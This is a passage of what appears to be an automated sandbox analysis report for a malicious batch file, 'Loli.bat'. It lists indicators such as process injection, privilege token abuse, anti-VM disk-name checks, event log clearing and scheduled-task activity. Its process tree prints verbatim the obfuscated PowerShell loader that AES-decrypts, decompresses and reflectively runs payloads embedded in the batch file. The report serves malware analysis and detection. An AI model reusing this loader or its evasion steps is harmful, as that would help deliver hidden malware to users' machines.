GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1792 powershell.exe 1792 powershell.exe 1792 powershell.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1792 powershell.exe Token: SeDebugPrivilege 1020 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 1944 svchost.exe Token: SeIncreaseQuotaPrivilege 1944 svchost.exe Token: SeSecurityPrivilege 1944 svchost.exe Token: SeTakeOwnershipPrivilege 1944 svchost.exe Token: SeLoadDriverPrivilege 1944 svchost.exe Token: SeSystemtimePrivilege 1944 svchost.exe Token: SeBackupPrivilege 1944 svchost.exe Token: SeRestorePrivilege 1944 svchost.exe Token: SeShutdownPrivilege 1944 svchost.exe Token: SeSystemEnvironmentPrivilege 1944 svchost.exe Token: SeUndockPrivilege 1944 svchost.exe Token: SeManageVolumePrivilege 1944 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1944 svchost.exe Token: SeIncreaseQuotaPrivilege 1944 svchost.exe Token: SeSecurityPrivilege 1944 svchost.exe Token: SeTakeOwnershipPrivilege 1944 svchost.exe Token: SeLoadDriverPrivilege 1944 svchost.exe Token: SeSystemtimePrivilege 1944 svchost.exe Token: SeBackupPrivilege 1944 svchost.exe Token: SeRestorePrivilege 1944 svchost.exe Token: SeShutdownPrivilege 1944 svchost.exe Token: SeSystemEnvironmentPrivilege 1944 svchost.exe Token: SeUndockPrivilege 1944 svchost.exe Token: SeManageVolumePrivilege 1944 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1944 svchost.exe Token: SeIncreaseQuotaPrivilege 1944 svchost.exe Token: SeSecurityPrivilege 1944 svchost.exe Token: SeTakeOwnershipPrivilege 1944 svchost.exe Token: SeLoadDriverPrivilege 1944 svchost.exe Token: SeSystemtimePrivilege 1944 svchost.exe Token: SeBackupPrivilege 1944 svchost.exe Token: SeRestorePrivilege 1944 svchost.exe Token: SeShutdownPrivilege 1944 svchost.exe Token: SeSystemEnvironmentPrivilege 1944 svchost.exe Token: SeUndockPrivilege 1944 svchost.exe Token: SeManageVolumePrivilege 1944 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1944 svchost.exe Token: SeIncreaseQuotaPrivilege 1944 svchost.exe Token: SeSecurityPrivilege 1944 svchost.exe Token: SeTakeOwnershipPrivilege 1944 svchost.exe Token: SeLoadDriverPrivilege 1944 svchost.exe Token: SeSystemtimePrivilege 1944 svchost.exe Token: SeBackupPrivilege 1944 svchost.exe Token: SeRestorePrivilege 1944 svchost.exe Token: SeShutdownPrivilege 1944 svchost.exe Token: SeSystemEnvironmentPrivilege 1944 svchost.exe Token: SeUndockPrivilege 1944 svchost.exe Token: SeManageVolumePrivilege 1944 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1944 svchost.exe Token: SeIncreaseQuotaPrivilege 1944 svchost.exe Token: SeSecurityPrivilege 1944 svchost.exe Token: SeTakeOwnershipPrivilege 1944 svchost.exe Token: SeLoadDriverPrivilege 1944 svchost.exe Token: SeSystemtimePrivilege 1944 svchost.exe Token: SeBackupPrivilege 1944 svchost.exe Token: SeRestorePrivilege 1944 svchost.exe Token: SeShutdownPrivilege 1944 svchost.exe Token: SeSystemEnvironmentPrivilege 1944 svchost.exe Token: SeUndockPrivilege 1944 svchost.exe Token: SeManageVolumePrivilege 1944 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1944 svchost.exe Token: SeIncreaseQuotaPrivilege 1944 svchost.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 3532 Explorer.EXE 3532 Explorer.EXE 3532 Explorer.EXE 3532 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4984 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 720 wrote to memory of 1208 720 cmd.exe 84 PID 720 wrote to memory of 1208 720 cmd.exe 84 PID 720 wrote to memory of 1136 720 cmd.exe 85 PID 720 wrote to memory of 1136 720 cmd.exe 85 PID 720 wrote to memory of 1464 720 cmd.exe 86 PID 720 wrote to memory of 1464 720 cmd.exe 86 PID 720 wrote to memory of 3100 720 cmd.exe 87 PID 720 wrote to memory of 3100 720 cmd.exe 87 PID 720 wrote to memory of 452 720 cmd.exe 88 PID 720 wrote to memory of 452 720 cmd.exe 88 PID 720 wrote to memory of 1792 720 cmd.exe 89 PID 720 wrote to memory of 1792 720 cmd.exe 89 PID 1792 wrote to memory of 1020 1792 powershell.exe 90 PID 1792 wrote to memory of 1020 1792 powershell.exe 90 PID 1792 wrote to memory of 1020 1792 powershell.exe 90 PID 1792 wrote to memory of 1020 1792 powershell.exe 90 PID 1792 wrote to memory of 1020 1792 powershell.exe 90 PID 1792 wrote to memory of 1020 1792 powershell.exe 90 PID 1792 wrote to memory of 1020 1792 powershell.exe 90 PID 1792 wrote to memory of 1020 1792 powershell.exe 90 PID 1020 wrote to memory of 612 1020 dllhost.exe 5 PID 1020 wrote to memory of 680 1020 dllhost.exe 7 PID 1020 wrote to memory of 960 1020 dllhost.exe 12 PID 1020 wrote to memory of 376 1020 dllhost.exe 13 PID 1020 wrote to memory of 408 1020 dllhost.exe 14 PID 1020 wrote to memory of 64 1020 dllhost.exe 15 PID 1020 wrote to memory of 1112 1020 dllhost.exe 17 PID 1020 wrote to memory of 1120 1020 dllhost.exe 18 PID 1020 wrote to memory of 1140 1020 dllhost.exe 19 PID 1020 wrote to memory of 1180 1020 dllhost.exe 20 PID 1020 wrote to memory of 1260 1020 dllhost.exe 21 PID 1020 wrote to memory of 1300 1020 dllhost.exe 22 PID 1020 wrote to memory of 1356 1020 dllhost.exe 23 PID 1020 wrote to memory of 1436 1020 dllhost.exe 24 PID 1020 wrote to memory of 1448 1020 dllhost.exe 25 PID 1020 wrote to memory of 1568 1020 dllhost.exe 26 PID 1020 wrote to memory of 1576 1020 dllhost.exe 27 PID 1020 wrote to memory of 1640 1020 dllhost.exe 28 PID 1020 wrote to memory of 1716 1020 dllhost.exe 29 PID 1020 wrote to memory of 1768 1020 dllhost.exe 30 PID 1020 wrote to memory of 1776 1020 dllhost.exe 31 PID 1020 wrote to memory of 1944 1020 dllhost.exe 32 PID 1020 wrote to memory of 1972 1020 dllhost.exe 33 PID 1020 wrote to memory of 2040 1020 dllhost.exe 34 PID 1020 wrote to memory of 952 1020 dllhost.exe 35 PID 1020 wrote to memory of 1908 1020 dllhost.exe 36 PID 1020 wrote to memory of 2084 1020 dllhost.exe 37 PID 1020 wrote to memory of 2168 1020 dllhost.exe 38 PID 1020 wrote to memory of 2276 1020 dllhost.exe 40 PID 1020 wrote to memory of 2384 1020 dllhost.exe 41 PID 1020 wrote to memory of 2532 1020 dllhost.exe 42 PID 1020 wrote to memory of 2548 1020 dllhost.exe 43 PID 1020 wrote to memory of 2652 1020 dllhost.exe 44 PID 1020 wrote to memory of 2672 1020 dllhost.exe 45 PID 1020 wrote to memory of 2684 1020 dllhost.exe 46 PID 1020 wrote to memory of 2704 1020 dllhost.exe 47 PID 1020 wrote to memory of 2844 1020 dllhost.exe 48 PID 1020 wrote to memory of 2900 1020 dllhost.exe 49 PID 1020 wrote to memory of 2916 1020 dllhost.exe 50 PID 1020 wrote to memory of 2940 1020 dllhost.exe 51 PID 1020 wrote to memory of 2952 1020 dllhost.exe 52 PID 1020 wrote to memory of 3112 1020 dllhost.exe 53 PID 1020 wrote to memory of 3400 1020 dllhost.exe 55 PID 1020 wrote to memory of 3532 1020 dllhost.exe 56 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:376
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{feb6a93c-5813-4638-847b-166fc47dc3c8}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1020
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{2041e3d9-8e1c-42ca-a550-2559803e5381}2⤵PID:232
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Drops file in System32 directory
PID:680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:408
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:64
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1112
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1120
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1140 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2652
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1180
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1260
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1300
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1436
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1448
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2532
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1568
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1576
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1640
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1716
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1768
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1776
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1944
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1972
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2040
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:952
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1908
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2084
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2168
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2276
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2548
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2704
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2844
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Enumerates connected drives
PID:2900
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2916
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2940
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2952
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3112
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3400
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of FindShellTrayWindow
PID:3532 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loli.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:720 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4396
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives3⤵PID:1208
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK"3⤵PID:1136
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives3⤵PID:1464
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"3⤵PID:3100
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function lLFL($Evck){ Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Verbose '$mKWg=[GrSGrysGrteGrmGr.GrSGreGrcGruGrriGrtGryGr.GrCGrryGrpGrtoGrgrGraGrphGryGr.AGreGrsGr]:Gr:GrCGrreGratGreGr(Gr)Gr;'.Replace('Gr', ''); Invoke-Expression -Verbose '$mKWg.Mupoupdeup=[upSupyupsuptupeupmup.Supeupcupuuprupitupyup.Cupryuppuptoupguprauppuphupy.upCupiupphuperupMupoupdupe]up:up:CupBupC;'.Replace('up', ''); Invoke-Expression -WarningAction Inquire '$mKWg.Polaolddolinolgol=ol[olSolyolsolteolmol.olSoleolcuolrolitoly.olColryolpoltoolgolrolapolholyol.PoladoldoliolnolgMolooldeol]ol::olPolKolCSol7;'.Replace('ol', ''); Invoke-Expression -WarningAction Inquire -Debug '$mKWg.Kqzeqzy=qz[Sqzyqzsqztqzeqzmqz.qzCoqznqzvqzeqzrqzt]qz:qz:FqzroqzmqzBaqzsqze6qz4qzSqztrqziqznqzg("Oqzqqz2CqzCDqzaqzUqzoqz1qzpqzlqz9KqzdqzkqzdqzUqz/8qziqzbvqzXzqz7qzKvqzQqzOhqzHqzKqzciqz1qzzqzOAqzA1qzMqzgqz=qz");'.Replace('qz', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore '$mKWg.IoiVoi=[oiSyoisoitoieoimoi.oiCoionoivoieoiroitoi]:oi:oiFroiomoiBoiasoieoi64oiSoitoirioinoig("yoiWoiqQoiZBoiioi8oiYoiBoipoiHoiokoigoiVoi8oijoip9oiDoig=oi=");'.Replace('oi', ''); $QHGC=$mKWg.CreateDecryptor(); $nTbJ=$QHGC.TransformFinalBlock($Evck, 0, $Evck.Length); $QHGC.Dispose(); $mKWg.Dispose(); $nTbJ;}function shQb($Evck){ Invoke-Expression -InformationAction Ignore '$Mglv=Nmremrw-mrObmrjmremrcmrtmr mrSmrysmrtmremrmmr.mrIOmr.mrMemrmomrrmrySmrtmrremramrmmr(,$Evck);'.Replace('mr', ''); Invoke-Expression -Verbose '$GHjF=Nmremrw-mrObmrjmremrcmrtmr mrSmrysmrtmremrmmr.mrIOmr.mrMemrmomrrmrySmrtmrremramrmmr;'.Replace('mr', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire '$orXI=NWneWnw-WnObWnjWneWncWntWn WnSWnysWntWneWnmWn.WnIOWn.WnCoWnmpWnrWnesWnsWnioWnnWn.WnGZWniWnpWnStWnreWnaWnmWn($Mglv, [WnIWnO.WnCoWnmWnpWnrWneWnsWnsWnioWnnWn.WnCWnoWnmpWnrWnesWnsiWnoWnnMWnoWndeWn]Wn:Wn:DWneWncWnomWnprWneWnsWnsWn);'.Replace('Wn', ''); $orXI.CopyTo($GHjF); $orXI.Dispose(); $Mglv.Dispose(); $GHjF.Dispose(); $GHjF.ToArray();}function VoZH($Evck,$eEYb){ Invoke-Expression -InformationAction Ignore -Debug '$fypJ=[aZSaZysaZteaZmaZ.aZRaZeaZfaZlaZecaZtaZiaZoaZnaZ.AaZsaZseaZmbaZlaZy]aZ:aZ:LaZoaZaaZd([byte[]]$Evck);'.Replace('aZ', ''); Invoke-Expression -Debug '$vQiS=$fypJ.ErvnrvtrrvyPrvorvirvnrvtrv;'.Replace('rv', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Verbose '$vQiS.yAIyAnvyAokyAeyA(yA$yAnyAuyAlyAl, $eEYb);'.Replace('yA', '');}$hMDf = 'C:\Users\Admin\AppData\Local\Temp\Loli.bat';$host.UI.RawUI.WindowTitle = $hMDf;$TOQa=[System.IO.File]::ReadAllText($hMDf).Split([Environment]::NewLine);foreach ($oqEJ in $TOQa) { if ($oqEJ.StartsWith('JDHFE')) { $WJam=$oqEJ.Substring(5); break; }}$PQwI=[string[]]$WJam.Split('\');Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore -Verbose '$wOZ = shQb (lLFL ([QACQAonQAveQArQAtQA]QA:QA:QAFQAroQAmQABQAaQAsQAe6QA4QAStQAriQAnQAg($PQwI[0].Replace("#", "/").Replace("@", "A"))));'.Replace('QA', '');Invoke-Expression -Verbose -InformationAction Ignore -Debug '$aAi = shQb (lLFL ([QACQAonQAveQArQAtQA]QA:QA:QAFQAroQAmQABQAaQAsQAe6QA4QAStQAriQAnQAg($PQwI[1].Replace("#", "/").Replace("@", "A"))));'.Replace('QA', '');Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire -Debug '$zlF = shQb (lLFL ([QACQAonQAveQArQAtQA]QA:QA:QAFQAroQAmQABQAaQAsQAe6QA4QAStQAriQAnQAg($PQwI[2].Replace("#", "/").Replace("@", "A"))));'.Replace('QA', '');VoZH $wOZ $null;VoZH $aAi $null;VoZH $zlF (,[string[]] (''));3⤵PID:452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1792 -s 25004⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3752
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\Loli.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat4⤵
- Drops file in Windows directory
PID:536 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "4⤵PID:4616
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1224
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives5⤵PID:676
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK"5⤵PID:3500
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives5⤵PID:2248
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"5⤵PID:3852
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function lLFL($Evck){ Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Verbose '$mKWg=[GrSGrysGrteGrmGr.GrSGreGrcGruGrriGrtGryGr.GrCGrryGrpGrtoGrgrGraGrphGryGr.AGreGrsGr]:Gr:GrCGrreGratGreGr(Gr)Gr;'.Replace('Gr', ''); Invoke-Expression -Verbose '$mKWg.Mupoupdeup=[upSupyupsuptupeupmup.Supeupcupuuprupitupyup.Cupryuppuptoupguprauppuphupy.upCupiupphuperupMupoupdupe]up:up:CupBupC;'.Replace('up', ''); Invoke-Expression -WarningAction Inquire '$mKWg.Polaolddolinolgol=ol[olSolyolsolteolmol.olSoleolcuolrolitoly.olColryolpoltoolgolrolapolholyol.PoladoldoliolnolgMolooldeol]ol::olPolKolCSol7;'.Replace('ol', ''); Invoke-Expression -WarningAction Inquire -Debug '$mKWg.Kqzeqzy=qz[Sqzyqzsqztqzeqzmqz.qzCoqznqzvqzeqzrqzt]qz:qz:FqzroqzmqzBaqzsqze6qz4qzSqztrqziqznqzg("Oqzqqz2CqzCDqzaqzUqzoqz1qzpqzlqz9KqzdqzkqzdqzUqz/8qziqzbvqzXzqz7qzKvqzQqzOhqzHqzKqzciqz1qzzqzOAqzA1qzMqzgqz=qz");'.Replace('qz', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore '$mKWg.IoiVoi=[oiSyoisoitoieoimoi.oiCoionoivoieoiroitoi]:oi:oiFroiomoiBoiasoieoi64oiSoitoirioinoig("yoiWoiqQoiZBoiioi8oiYoiBoipoiHoiokoigoiVoi8oijoip9oiDoig=oi=");'.Replace('oi', ''); $QHGC=$mKWg.CreateDecryptor(); $nTbJ=$QHGC.TransformFinalBlock($Evck, 0, $Evck.Length); $QHGC.Dispose(); $mKWg.Dispose(); $nTbJ;}function shQb($Evck){ Invoke-Expression -InformationAction Ignore '$Mglv=Nmremrw-mrObmrjmremrcmrtmr mrSmrysmrtmremrmmr.mrIOmr.mrMemrmomrrmrySmrtmrremramrmmr(,$Evck);'.Replace('mr', ''); Invoke-Expression -Verbose '$GHjF=Nmremrw-mrObmrjmremrcmrtmr mrSmrysmrtmremrmmr.mrIOmr.mrMemrmomrrmrySmrtmrremramrmmr;'.Replace('mr', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire '$orXI=NWneWnw-WnObWnjWneWncWntWn WnSWnysWntWneWnmWn.WnIOWn.WnCoWnmpWnrWnesWnsWnioWnnWn.WnGZWniWnpWnStWnreWnaWnmWn($Mglv, [WnIWnO.WnCoWnmWnpWnrWneWnsWnsWnioWnnWn.WnCWnoWnmpWnrWnesWnsiWnoWnnMWnoWndeWn]Wn:Wn:DWneWncWnomWnprWneWnsWnsWn);'.Replace('Wn', ''); $orXI.CopyTo($GHjF); $orXI.Dispose(); $Mglv.Dispose(); $GHjF.Dispose(); $GHjF.ToArray();}function VoZH($Evck,$eEYb){ Invoke-Expression -InformationAction Ignore -Debug '$fypJ=[aZSaZysaZteaZmaZ.aZRaZeaZfaZlaZecaZtaZiaZoaZnaZ.AaZsaZseaZmbaZlaZy]aZ:aZ:LaZoaZaaZd([byte[]]$Evck);'.Replace('aZ', ''); Invoke-Expression -Debug '$vQiS=$fypJ.ErvnrvtrrvyPrvorvirvnrvtrv;'.Replace('rv', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Verbose '$vQiS.yAIyAnvyAokyAeyA(yA$yAnyAuyAlyAl, $eEYb);'.Replace('yA', '');}$hMDf = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $hMDf;$TOQa=[System.IO.File]::ReadAllText($hMDf).Split([Environment]::NewLine);foreach ($oqEJ in $TOQa) { if ($oqEJ.StartsWith('JDHFE')) { $WJam=$oqEJ.Substring(5); break; }}$PQwI=[string[]]$WJam.Split('\');Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore -Verbose '$wOZ = shQb (lLFL ([QACQAonQAveQArQAtQA]QA:QA:QAFQAroQAmQABQAaQAsQAe6QA4QAStQAriQAnQAg($PQwI[0].Replace("#", "/").Replace("@", "A"))));'.Replace('QA', '');Invoke-Expression -Verbose -InformationAction Ignore -Debug '$aAi = shQb (lLFL ([QACQAonQAveQArQAtQA]QA:QA:QAFQAroQAmQABQAaQAsQAe6QA4QAStQAriQAnQAg($PQwI[1].Replace("#", "/").Replace("@", "A"))));'.Replace('QA', '');Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire -Debug '$zlF = shQb (lLFL ([QACQAonQAveQArQAtQA]QA:QA:QAFQAroQAmQABQAaQAsQAe6QA4QAStQAriQAnQAg($PQwI[2].Replace("#", "/").Replace("@", "A"))));'.Replace('QA', '');VoZH $wOZ $null;VoZH $aAi $null;VoZH $zlF (,[string[]] (''));5⤵PID:2540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:4984 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4984 -s 25646⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:1588
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4984 -s 25846⤵PID:2424
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F6⤵PID:3300
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:4076
-
-
-
-
-
-
-
C:\Windows\$nya-onimai2\oAAqwn.exe"C:\Windows\$nya-onimai2\oAAqwn.exe"2⤵
- Executes dropped EXE
PID:4348 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5112
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3680
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3856
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4012
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3984
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:532
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4164
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1200
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:516
-
